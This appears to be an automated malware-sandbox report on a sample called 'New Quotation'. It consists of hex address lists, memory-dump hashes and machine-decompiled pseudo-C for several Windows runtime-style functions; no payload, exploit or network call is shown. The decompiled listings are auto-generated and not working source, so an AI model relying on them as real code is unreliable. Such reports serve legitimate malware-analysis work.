                                                                                                                                                                                          0x1d811ef4
                                                                                                                                                                                          0x1d811ef6
                                                                                                                                                                                          0x1d811f60
                                                                                                                                                                                          0x1d811f63
                                                                                                                                                                                          0x1d811f7e
                                                                                                                                                                                          0x1d811f7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811f7e
                                                                                                                                                                                          0x1d811f67
                                                                                                                                                                                          0x1d811f6b
                                                                                                                                                                                          0x1d811f70
                                                                                                                                                                                          0x1d811f72
                                                                                                                                                                                          0x1d811f7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811f7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811f74
                                                                                                                                                                                          0x1d811efd
                                                                                                                                                                                          0x1d811eff
                                                                                                                                                                                          0x1d811f02
                                                                                                                                                                                          0x1d811f0a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849f7e
                                                                                                                                                                                          0x1d811f23
                                                                                                                                                                                          0x1d811f27
                                                                                                                                                                                          0x1d811f87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811f87
                                                                                                                                                                                          0x1d811f2d
                                                                                                                                                                                          0x1d811f30
                                                                                                                                                                                          0x1d811f34
                                                                                                                                                                                          0x1d811f39
                                                                                                                                                                                          0x1d811f41
                                                                                                                                                                                          0x1d811f8c
                                                                                                                                                                                          0x1d811f8d
                                                                                                                                                                                          0x1d811f94
                                                                                                                                                                                          0x1d811f95
                                                                                                                                                                                          0x1d811f96
                                                                                                                                                                                          0x1d811f97
                                                                                                                                                                                          0x1d811f9b
                                                                                                                                                                                          0x1d811fa2
                                                                                                                                                                                          0x1d811fa5
                                                                                                                                                                                          0x1d811fad
                                                                                                                                                                                          0x1d811faf
                                                                                                                                                                                          0x1d811fb1
                                                                                                                                                                                          0x1d811fff
                                                                                                                                                                                          0x1d812001
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d812001
                                                                                                                                                                                          0x1d811fb3
                                                                                                                                                                                          0x1d811fb8
                                                                                                                                                                                          0x1d811fb9
                                                                                                                                                                                          0x1d811fbb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811fc1
                                                                                                                                                                                          0x1d811fc3
                                                                                                                                                                                          0x1d811fc5
                                                                                                                                                                                          0x1d811ff8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811ff8
                                                                                                                                                                                          0x1d811fc7
                                                                                                                                                                                          0x1d811fca
                                                                                                                                                                                          0x1d811fca
                                                                                                                                                                                          0x1d811fce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811fd3
                                                                                                                                                                                          0x1d811fd5
                                                                                                                                                                                          0x1d811fd7
                                                                                                                                                                                          0x1d811fdd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811fe5
                                                                                                                                                                                          0x1d811fe7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811ff0
                                                                                                                                                                                          0x1d811ff0
                                                                                                                                                                                          0x1d811ff3
                                                                                                                                                                                          0x1d811ff4
                                                                                                                                                                                          0x1d811ff4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d811fca
                                                                                                                                                                                          0x1d811f43
                                                                                                                                                                                          0x1d811f45
                                                                                                                                                                                          0x1d811f48
                                                                                                                                                                                          0x1d811f4e
                                                                                                                                                                                          0x1d811f50
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
                                                                                                                                                                                          • Instruction ID: 06fce7f9049d11e672897f6b17cc90b662ce3b1f8716e08dec526899b4c9ccbf
                                                                                                                                                                                          • Opcode Fuzzy Hash: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621C275A00609EFD721CF58C544E5AB7F8FF44750F11896AE549EB210D370ED088B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D876D79 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D876D79(void* __eflags) {
				char _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v44;
				signed int _t31;
				signed int _t32;
				intOrPtr _t37;
				signed int _t41;
				signed int _t50;
				intOrPtr _t53;
				intOrPtr _t55;

				_t53 =  *[fs:0x30];
				_v32 = _t53;
				E1D7DFED0(0x1d8c4800);
				E1D8A01EA(0x1d8c6dc8, 1,  &_v20);
				_t50 = 0;
				_t41 = 0;
				if( *((intOrPtr*)(_t53 + 0x88)) <= 0) {
					L9:
					return _t50;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x90)) + _t41 * 4));
					if( *((intOrPtr*)(_t55 + 8)) != 0xddeeddee) {
						__eflags =  *(_t55 + 0x40) & 0x00000001;
						if(( *(_t55 + 0x40) & 0x00000001) != 0) {
							goto L15;
						}
						_t14 =  &_v24;
						 *_t14 = _v24 | 0xffffffff;
						__eflags =  *_t14;
						_v36 = _t50;
						_v28 = 0xfffc2f70;
						while(1) {
							_t31 = E1D800990(__eflags,  *((intOrPtr*)(_t55 + 0xc8)));
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_push( &_v28);
							_push(_t50);
							E1D812CF0();
							_t37 = _v44 + 1;
							_v44 = _t37;
							__eflags = _t37 - 0x64;
							if(__eflags < 0) {
								continue;
							}
							__eflags = 0;
							_t50 = 0xc0000194;
							E1D8799D6(0, _t41);
							goto L9;
						}
						__eflags =  *((char*)(_t55 + 0xea)) - 2;
						if( *((char*)(_t55 + 0xea)) != 2) {
							_t32 = _t50;
						} else {
							_t32 =  *(_t55 + 0xe4);
						}
						__eflags = _t32;
						if(_t32 != 0) {
							L1D7E2330(_t32, _t32);
						}
					} else {
						if(( *(_t55 + 0xc) & 0x00000001) == 0) {
							E1D8994B4(_t55);
						}
					}
					L15:
					_t53 = _v32;
					_t41 = _t41 + 1;
				} while (_t41 <  *((intOrPtr*)(_t53 + 0x88)));
				goto L9;
			}
















                                                                                                                                                                                          0x1d876d86
                                                                                                                                                                                          0x1d876d93
                                                                                                                                                                                          0x1d876d97
                                                                                                                                                                                          0x1d876da9
                                                                                                                                                                                          0x1d876dae
                                                                                                                                                                                          0x1d876db0
                                                                                                                                                                                          0x1d876db8
                                                                                                                                                                                          0x1d876e28
                                                                                                                                                                                          0x1d876e30
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d876dba
                                                                                                                                                                                          0x1d876dba
                                                                                                                                                                                          0x1d876dc0
                                                                                                                                                                                          0x1d876dca
                                                                                                                                                                                          0x1d876ddb
                                                                                                                                                                                          0x1d876ddf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d876de1
                                                                                                                                                                                          0x1d876de1
                                                                                                                                                                                          0x1d876de1
                                                                                                                                                                                          0x1d876de6
                                                                                                                                                                                          0x1d876dea
                                                                                                                                                                                          0x1d876df2
                                                                                                                                                                                          0x1d876df8
                                                                                                                                                                                          0x1d876dfd
                                                                                                                                                                                          0x1d876dff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d876e05
                                                                                                                                                                                          0x1d876e06
                                                                                                                                                                                          0x1d876e07
                                                                                                                                                                                          0x1d876e10
                                                                                                                                                                                          0x1d876e11
                                                                                                                                                                                          0x1d876e15
                                                                                                                                                                                          0x1d876e18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d876e1c
                                                                                                                                                                                          0x1d876e1e
                                                                                                                                                                                          0x1d876e23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d876e23
                                                                                                                                                                                          0x1d876e31
                                                                                                                                                                                          0x1d876e38
                                                                                                                                                                                          0x1d876e42
                                                                                                                                                                                          0x1d876e3a
                                                                                                                                                                                          0x1d876e3a
                                                                                                                                                                                          0x1d876e3a
                                                                                                                                                                                          0x1d876e44
                                                                                                                                                                                          0x1d876e46
                                                                                                                                                                                          0x1d876e49
                                                                                                                                                                                          0x1d876e49
                                                                                                                                                                                          0x1d876dcc
                                                                                                                                                                                          0x1d876dd0
                                                                                                                                                                                          0x1d876dd4
                                                                                                                                                                                          0x1d876dd4
                                                                                                                                                                                          0x1d876dd0
                                                                                                                                                                                          0x1d876e4e
                                                                                                                                                                                          0x1d876e4e
                                                                                                                                                                                          0x1d876e52
                                                                                                                                                                                          0x1d876e53
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4597763ec2aa8bddab8547dcf00825350658ca38dafcf380b7296a463a546893
                                                                                                                                                                                          • Instruction ID: 6ea0d5b563f1c46557d1d6484ba4dc3e79abca91892818456a689a36c92d2e36
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4597763ec2aa8bddab8547dcf00825350658ca38dafcf380b7296a463a546893
                                                                                                                                                                                          • Instruction Fuzzy Hash: B721C1326087918FC351DA39C881B6BBBE9EFC4318F15492DF5AAC3151DB30A949C7A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84FF03 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E1D84FF03(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E1D7E3C40() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E1D7E3C40() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1d7a5dfc;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E1D7F40F0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E1D7F40F0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E1D850227(_a8, 0, 0, 0,  &_v36,  &_v28);
									E1D7E3B90( &_v52);
								}
								_t21 = E1D7E3B90( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                                                          0x1d84ff0e
                                                                                                                                                                                          0x1d84ff13
                                                                                                                                                                                          0x1d84ff15
                                                                                                                                                                                          0x1d84ff19
                                                                                                                                                                                          0x1d84ff1d
                                                                                                                                                                                          0x1d84ff21
                                                                                                                                                                                          0x1d84ff2c
                                                                                                                                                                                          0x1d84ff3e
                                                                                                                                                                                          0x1d84ff2e
                                                                                                                                                                                          0x1d84ff37
                                                                                                                                                                                          0x1d84ff37
                                                                                                                                                                                          0x1d84ff46
                                                                                                                                                                                          0x1d84ff4c
                                                                                                                                                                                          0x1d84ff59
                                                                                                                                                                                          0x1d84ff62
                                                                                                                                                                                          0x1d84ff74
                                                                                                                                                                                          0x1d84ff64
                                                                                                                                                                                          0x1d84ff6d
                                                                                                                                                                                          0x1d84ff6d
                                                                                                                                                                                          0x1d84ff7c
                                                                                                                                                                                          0x1d84ff7e
                                                                                                                                                                                          0x1d84ff80
                                                                                                                                                                                          0x1d84ff82
                                                                                                                                                                                          0x1d84ff82
                                                                                                                                                                                          0x1d84ff87
                                                                                                                                                                                          0x1d84ff8c
                                                                                                                                                                                          0x1d84ff8d
                                                                                                                                                                                          0x1d84ff92
                                                                                                                                                                                          0x1d84ff95
                                                                                                                                                                                          0x1d84ff9b
                                                                                                                                                                                          0x1d84ff9c
                                                                                                                                                                                          0x1d84ffa3
                                                                                                                                                                                          0x1d84ffa7
                                                                                                                                                                                          0x1d84ffba
                                                                                                                                                                                          0x1d84ffc4
                                                                                                                                                                                          0x1d84ffc4
                                                                                                                                                                                          0x1d84ffce
                                                                                                                                                                                          0x1d84ffce
                                                                                                                                                                                          0x1d84ffa3
                                                                                                                                                                                          0x1d84ff7c
                                                                                                                                                                                          0x1d84ff59
                                                                                                                                                                                          0x1d84ffd9

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b97a3a5528eb17daa03b9a9c929e38ae6d9a90df321f0b72983ca499f948dcdf
                                                                                                                                                                                          • Instruction ID: 71aec860b9c55f5c7a94fda180ff90e24763db823bc45a82196984cd4d7a2485
                                                                                                                                                                                          • Opcode Fuzzy Hash: b97a3a5528eb17daa03b9a9c929e38ae6d9a90df321f0b72983ca499f948dcdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 202126739083499BD311CF69D84CF6BB7ECEF82654F0544AABA50C7261DB34D908C6A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84CD40 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E1D84CD40(void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t28;
				void* _t33;
				signed int _t35;
				signed int _t42;
				void* _t43;
				short* _t46;

				_t42 = _a8;
				if((_t42 & 0xfffffffe) == 0) {
					_t35 = _a12;
					if((_t35 & 0xffff0000 | _a16) == 0) {
						_t46 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1c0);
						if(_t46 != 0) {
							E1D818F40(_t46, 0, 0x1c0);
							 *(_t46 + 0x20) = _t35;
							 *_t46 = 0x1c0;
							_t28 = _a16;
							 *(_t46 + 0x24) = _t28;
							 *((short*)(_t46 + 2)) = 1;
							_push(0x18);
							_v24 = _t28;
							_push( &_v28);
							_push(0x20);
							_push(_a4);
							_v16 = 1;
							_v20 = _t42;
							_v28 = _t35;
							_v12 = _t46;
							_t43 = E1D812A60();
							if(_t43 < 0) {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t46);
							} else {
								 *_a20 = _t46;
							}
							_t33 = _t43;
						} else {
							_t33 = 0xc0000017;
						}
					} else {
						_t33 = 0xc00000f1;
					}
				} else {
					_t33 = 0xc00000f0;
				}
				return _t33;
			}














                                                                                                                                                                                          0x1d84cd4e
                                                                                                                                                                                          0x1d84cd57
                                                                                                                                                                                          0x1d84cd63
                                                                                                                                                                                          0x1d84cd70
                                                                                                                                                                                          0x1d84cd92
                                                                                                                                                                                          0x1d84cd96
                                                                                                                                                                                          0x1d84cda7
                                                                                                                                                                                          0x1d84cdaf
                                                                                                                                                                                          0x1d84cdb9
                                                                                                                                                                                          0x1d84cdbd
                                                                                                                                                                                          0x1d84cdc0
                                                                                                                                                                                          0x1d84cdc3
                                                                                                                                                                                          0x1d84cdc7
                                                                                                                                                                                          0x1d84cdc9
                                                                                                                                                                                          0x1d84cdd1
                                                                                                                                                                                          0x1d84cdd2
                                                                                                                                                                                          0x1d84cdd4
                                                                                                                                                                                          0x1d84cdd7
                                                                                                                                                                                          0x1d84cddb
                                                                                                                                                                                          0x1d84cddf
                                                                                                                                                                                          0x1d84cde3
                                                                                                                                                                                          0x1d84cdec
                                                                                                                                                                                          0x1d84cdf0
                                                                                                                                                                                          0x1d84ce05
                                                                                                                                                                                          0x1d84cdf2
                                                                                                                                                                                          0x1d84cdf5
                                                                                                                                                                                          0x1d84cdf5
                                                                                                                                                                                          0x1d84ce0a
                                                                                                                                                                                          0x1d84cd98
                                                                                                                                                                                          0x1d84cd98
                                                                                                                                                                                          0x1d84cd98
                                                                                                                                                                                          0x1d84cd72
                                                                                                                                                                                          0x1d84cd72
                                                                                                                                                                                          0x1d84cd72
                                                                                                                                                                                          0x1d84cd59
                                                                                                                                                                                          0x1d84cd59
                                                                                                                                                                                          0x1d84cd59
                                                                                                                                                                                          0x1d84ce12

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
                                                                                                                                                                                          • Instruction ID: 29c15a6cb3b62b99aefcc3503aaec4f67a9ddefce5fc30810ebe27325af36634
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21D4766457089BD3119F1AD841B5B7BE8FF88B20F11452EF9489B3A0D334E90087EB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FBE80 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E1D7FBE80(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _t34;
				intOrPtr* _t40;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				signed int _t58;
				signed int _t61;
				signed int _t64;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr _t67;

				_t58 = __edx;
				_t34 = _a4;
				_t65 =  *[fs:0x18];
				if(_t34 == 0 || _t34 >= 0xff0) {
					return 0xc000000d;
				}
				_t51 =  *((intOrPtr*)(_t65 + 0xfb4));
				_t61 = _t34 + 0x10;
				if(_t51 != 0) {
					L3:
					asm("bsr edx, edi");
					_t67 =  *((intOrPtr*)(_t51 + _t58 * 4 - 8));
					asm("btc edi, edx");
					if(_t67 == 0) {
						L12();
						_t67 = _t34;
						if(_t67 != 0) {
							goto L4;
						}
						L17:
						return 0xc0000017;
					}
					L4:
					 *((intOrPtr*)(_t67 + 4 + _t61 * 4)) = _a8;
					return 0;
				}
				_t51 = E1D7E5D90(_t53,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x28);
				if(_t51 == 0) {
					goto L17;
				}
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((intOrPtr*)(_t51 + 8)) = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((intOrPtr*)(_t51 + 0x14)) = 0;
				 *((intOrPtr*)(_t51 + 0x18)) = 0;
				 *((intOrPtr*)(_t51 + 0x1c)) = 0;
				 *((intOrPtr*)(_t51 + 0x20)) = 0;
				 *((intOrPtr*)(_t51 + 0x24)) = 0;
				 *((intOrPtr*)(_t65 + 0xfb4)) = _t51;
				L1D7E2330(_t37, 0x1d8c66d0);
				_t40 =  *0x1d8c66f8; // 0x1998478
				if( *_t40 == 0x1d8c66f4) {
					 *_t51 = 0x1d8c66f4;
					 *((intOrPtr*)(_t51 + 4)) = _t40;
					 *_t40 = _t51;
					 *0x1d8c66f8 = _t51;
					_t34 = E1D7E24D0(0x1d8c66d0);
					goto L3;
				}
				asm("int 0x29");
				_push(3);
				_push(_t51);
				_push(_t65);
				_push(_t61);
				_t52 = _t58;
				_v24 = 3;
				_t64 = 1 << _t52 + 4;
				_t66 = E1D7E5D90(_t52 + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
				if(_t66 != 0) {
					 *_t66 = 0;
					 *((intOrPtr*)(_t66 + 4)) = 0;
					if(1 != 0) {
						E1D818F40(_t66 + 4, 0, _t64 << 2);
					}
					 *((intOrPtr*)(_v12 + _t52 * 4)) = _t66;
				}
				return _t66;
			}
















                                                                                                                                                                                          0x1d7fbe80
                                                                                                                                                                                          0x1d7fbe85
                                                                                                                                                                                          0x1d7fbe8a
                                                                                                                                                                                          0x1d7fbe94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e755
                                                                                                                                                                                          0x1d7fbea5
                                                                                                                                                                                          0x1d7fbeab
                                                                                                                                                                                          0x1d7fbeb0
                                                                                                                                                                                          0x1d7fbeb2
                                                                                                                                                                                          0x1d7fbeb2
                                                                                                                                                                                          0x1d7fbeb5
                                                                                                                                                                                          0x1d7fbebc
                                                                                                                                                                                          0x1d7fbec4
                                                                                                                                                                                          0x1d7fbf78
                                                                                                                                                                                          0x1d7fbf7d
                                                                                                                                                                                          0x1d7fbf81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e74b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83e74b
                                                                                                                                                                                          0x1d7fbeca
                                                                                                                                                                                          0x1d7fbecd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fbed1
                                                                                                                                                                                          0x1d7fbeec
                                                                                                                                                                                          0x1d7fbef0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fbef6
                                                                                                                                                                                          0x1d7fbefc
                                                                                                                                                                                          0x1d7fbf03
                                                                                                                                                                                          0x1d7fbf0a
                                                                                                                                                                                          0x1d7fbf11
                                                                                                                                                                                          0x1d7fbf18
                                                                                                                                                                                          0x1d7fbf1f
                                                                                                                                                                                          0x1d7fbf26
                                                                                                                                                                                          0x1d7fbf2d
                                                                                                                                                                                          0x1d7fbf34
                                                                                                                                                                                          0x1d7fbf40
                                                                                                                                                                                          0x1d7fbf46
                                                                                                                                                                                          0x1d7fbf4b
                                                                                                                                                                                          0x1d7fbf56
                                                                                                                                                                                          0x1d7fbf58
                                                                                                                                                                                          0x1d7fbf5e
                                                                                                                                                                                          0x1d7fbf61
                                                                                                                                                                                          0x1d7fbf68
                                                                                                                                                                                          0x1d7fbf6e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fbf6e
                                                                                                                                                                                          0x1d7fbf91
                                                                                                                                                                                          0x1d7fbf98
                                                                                                                                                                                          0x1d7fbf99
                                                                                                                                                                                          0x1d7fbf9a
                                                                                                                                                                                          0x1d7fbf9b
                                                                                                                                                                                          0x1d7fbf9c
                                                                                                                                                                                          0x1d7fbf9e
                                                                                                                                                                                          0x1d7fbfa7
                                                                                                                                                                                          0x1d7fbfc1
                                                                                                                                                                                          0x1d7fbfc5
                                                                                                                                                                                          0x1d7fbfc9
                                                                                                                                                                                          0x1d7fbfcb
                                                                                                                                                                                          0x1d7fbfd0
                                                                                                                                                                                          0x1d7fbfdd
                                                                                                                                                                                          0x1d7fbfe2
                                                                                                                                                                                          0x1d7fbfe8
                                                                                                                                                                                          0x1d7fbfe8
                                                                                                                                                                                          0x1d7fbff1

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 07a364b14584585fe511b88ac2cc6fae3cadabecff2d3b2d89ab54f352f27ac8
                                                                                                                                                                                          • Instruction ID: 2a4f7587436d3f9f595fc68468dbe49c1f954422ca59e050329c4f92795f61ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a364b14584585fe511b88ac2cc6fae3cadabecff2d3b2d89ab54f352f27ac8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1217CB1104355DFDB218F54C4C4B627BA4AB54768F0684B9DA184F796C7B4EC44CBD3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DB950 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D7DB950(void* __ecx, signed int _a4, signed int _a8, signed int _a12, signed int* _a16) {
				intOrPtr* _t16;
				signed char* _t17;
				signed char* _t19;
				void* _t32;
				intOrPtr* _t38;
				signed char* _t44;
				signed char* _t48;

				_push(__ecx);
				_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_t44 = 0x7ffe0385;
				if(_t16 != 0) {
					if( *_t16 == 0) {
						goto L1;
					}
					_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					_t48 = 0x7ffe0384;
					if(( *_t17 & 0x00000001) != 0) {
						if(E1D7E3C40() == 0) {
							_t19 = 0x7ffe0384;
						} else {
							_t19 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1D85FC01(0x1d7a1c08,  *_t19 & 0x000000ff);
					}
					_t32 = E1D7DC6E0(_a4, _a8, _a12, 0, _a16);
					_t38 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t38 != 0) {
						if( *_t38 != 0) {
							_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
					}
					if(( *_t44 & 0x00000001) != 0) {
						if(E1D7E3C40() != 0) {
							_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1D85FC01(0x1d7a1bf8,  *_t48 & 0x000000ff);
					}
					return _t32;
				}
				L1:
				_t17 = _t44;
				goto L2;
			}










                                                                                                                                                                                          0x1d7db958
                                                                                                                                                                                          0x1d7db962
                                                                                                                                                                                          0x1d7db965
                                                                                                                                                                                          0x1d7db96c
                                                                                                                                                                                          0x1d83373a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
